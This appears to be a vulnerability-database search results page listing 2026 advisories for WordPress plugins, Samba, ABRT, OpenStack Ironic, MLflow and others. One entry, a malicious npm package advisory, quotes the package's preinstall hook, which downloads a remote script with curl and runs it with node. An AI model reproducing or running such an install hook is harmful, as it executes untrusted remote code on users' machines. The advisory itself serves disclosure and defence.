Lucene search
K

342 matches found

CVE
CVE
added 4 hours ago7 views

CVE-2026-13014

The CVE covers Thales CERT "Suspicious" application, affected at versions

9.2CVSS6.4AI score
Exploits0References1
EUVD
EUVD
added 3 days ago7 views

EUVD-2026-42792

The ARMember plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.0.27 via the 'X-FILENAME' HTTP header. This makes it possible for unauthenticated attackers to upload and overwrite certain files e.g., CSS to directories outside the...

5.3CVSS5.9AI score0.00533EPSS
Exploits0References2
Positive Technologies
Positive Technologies
added 2026/07/06 12:0 a.m.13 views

PT-2026-56083

Name of the Vulnerable Software and Affected Versions 9Router versions prior to 0.4.80 Description The /api/settings/database endpoint allows for full database export and import without sufficient authentication. The export function returns the complete database, including plaintext API keys in t...

9.9CVSS6.1AI score0.00685EPSS
Exploits0References6
EUVD
EUVD
added 2026/07/04 8:38 p.m.7 views

EUVD-2024-55648

The silent Just-In-Time JIT provisioning feature in federated authentication implementations fails to properly segregate user roles during account creation when a federated user shares a username with a local user. This allows the provisioning process to overwrite existing roles of local users wi...

4.8CVSS5.9AI score0.00191EPSS
Exploits0References1
ATTACKERKB
ATTACKERKB
added 2026/07/03 6:50 a.m.5 views

CVE-2026-9230

The Quiz and Survey Master QSM – Easy Quiz and Survey Maker plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 11.1.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for...

4.3CVSS6AI score0.00312EPSS
Exploits0References15
NVD
NVD
added 2026/06/24 7:16 a.m.9 views

CVE-2026-11997

The Bulk SEO Image plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 1.1. This is due to missing or incorrect nonce validation on the plugin's settings page handler BulkSeoImage, which dispatches to launchbulk / BulkSeoImageGo whenever the request...

4.3CVSS0.00128EPSS
Exploits0References4
CVE
CVE
added 2026/06/13 2:34 a.m.33 views

CVE-2026-54230

CVE-2026-54230 describes a symlink-following vulnerability in ABRT’s libreport post-create event handler scripts. The scripts write output via shell redirections without O_NOFOLLOW, so if a target file is replaced with a symlink, a root process can overwrite arbitrary files on the system. This is...

7.8CVSS5.5AI score0.0014EPSS
Exploits0References3Affected Software3
Vulnrichment
Vulnrichment
added 2026/06/13 2:34 a.m.8 views

CVE-2026-54230 Abrt: event handler scripts follow symlinks when writing output files, allowing arbitrary file overwrites

A symlink following vulnerability was found in the ABRT post-create event handler scripts in libreport. Event scripts write output files using shell redirections without the ONOFOLLOW flag. If the target file is replaced with a symlink, the shell process running as root follows the symlink and...

7CVSS5.5AI score0.0014EPSS
Exploits0References2
OSV
OSV
added 2026/06/11 12:38 p.m.12 views

MAL-2026-5645 Malicious code in sn-internal-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On any npm install...

5.8AI score
Exploits0References3
RedhatCVE
RedhatCVE
added 2026/06/10 9:27 p.m.10 views

CVE-2026-48681

A flaw was found in OpenStack Ironic before 35.0.2. A directory traversal vulnerability during deployment allows an attacker to overwrite files on the system when a crafted ISO image is used. This can compromise confidentiality and integrity of files on the deployment target...

8.1CVSS5.4AI score0.00601EPSS
Exploits0References5
Positive Technologies
Positive Technologies
added 2026/06/10 12:0 a.m.24 views

PT-2026-48445

Name of the Vulnerable Software and Affected Versions migration-planner affected versions not specified Description The agent-API middleware processes JSON Web Tokens JWTs for authentication, but the UpdateSourceInventory and UpdateAgentStatus handlers do not validate the source id claim within t...

9.6CVSS5.9AI score0.00286EPSS
Exploits0References5
EUVD
EUVD
added 2026/06/06 12:31 a.m.14 views

EUVD-2026-34926

The Frontend User Notes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on the funpajaxmodifynotes function. This makes it possible for unauthenticated attackers to trick a logged-in...

4.3CVSS5.4AI score0.00132EPSS
Exploits0References7
Ubuntu
Ubuntu
added 2026/05/26 1:32 p.m.19 views

USN-8306-1: Samba vulnerabilities

Asim Viladi Oglu Manizada discovered that Samba incorrectly handled access checks on reparse point operations. An attacker could possibly use this issue to modify reparse point extended attributes on files that should have been read-only. This issue only affected Ubuntu 25.10 and Ubuntu 26.04 LTS...

9.8CVSS6.2AI score0.12797EPSS
Exploits9
OSV
OSV
added 2026/05/26 1:32 p.m.16 views

USN-8306-1 samba vulnerabilities

Asim Viladi Oglu Manizada discovered that Samba incorrectly handled access checks on reparse point operations. An attacker could possibly use this issue to modify reparse point extended attributes on files that should have been read-only. This issue only affected Ubuntu 25.10 and Ubuntu 26.04 LTS...

9.8CVSS6.2AI score0.12797EPSS
Exploits9References7
Samba
Samba
added 2026/05/26 12:0 a.m.13 views

WORM vfs module does not block overwrites

Description The vfsworm module is intended to make files immutable over SMB a short time after they are created. The time window in which they are writable is configurable, defaulting to one hour. The hook that handles renames was checking that the file being renamed was still mutable, but it was...

6.5CVSS5.8AI score0.00939EPSS
Exploits0
Positive Technologies
Positive Technologies
added 2026/05/26 12:0 a.m.19 views

PT-2026-43438

Name of the Vulnerable Software and Affected Versions Samba affected versions not specified Description A flaw exists in the handling of certificate auto-enrollment Group Policy. When this feature is enabled, Samba may retrieve a CA certificate via an unencrypted HTTP connection and install it in...

8CVSS5.8AI score0.02669EPSS
Exploits0References103
UbuntuCve
UbuntuCve
added 2026/05/26 12:0 a.m.11 views

CVE-2026-2340

WORM vfs module does not block overwrites...

6.5CVSS5.8AI score0.00939EPSS
Exploits0References2
Positive Technologies
Positive Technologies
added 2026/05/26 12:0 a.m.16 views

PT-2026-43436

Name of the Vulnerable Software and Affected Versions Samba affected versions not specified Description A flaw exists in the handling of NTFS-style reparse points on shares configured with read only = yes. Due to missing SMB-layer access checks, authenticated users who possess underlying filesyst...

7.5CVSS5.8AI score0.00939EPSS
Exploits0References87
Positive Technologies
Positive Technologies
added 2026/05/26 12:0 a.m.22 views

PT-2026-43437

Name of the Vulnerable Software and Affected Versions Samba affected versions not specified Description A flaw exists in the vfs worm module, which is designed to provide write-once, read-many WORM protections by preventing file modifications after a specific grace period. Due to insufficient...

7.5CVSS5.8AI score0.02669EPSS
Exploits0References85
CNNVD
CNNVD
added 2026/05/25 12:0 a.m.10 views

MLflow 安全漏洞

MLflow is an open source platform from MLflow that simplifies machine learning development, including tracking experiments, packaging code into repeatable runs, and sharing and deploying models. A security vulnerability exists in MLflow 3.10.1.dev0 and prior versions, which stems from the...

9CVSS7.6AI score0.00345EPSS
Exploits1References2
Rows per page
Query Builder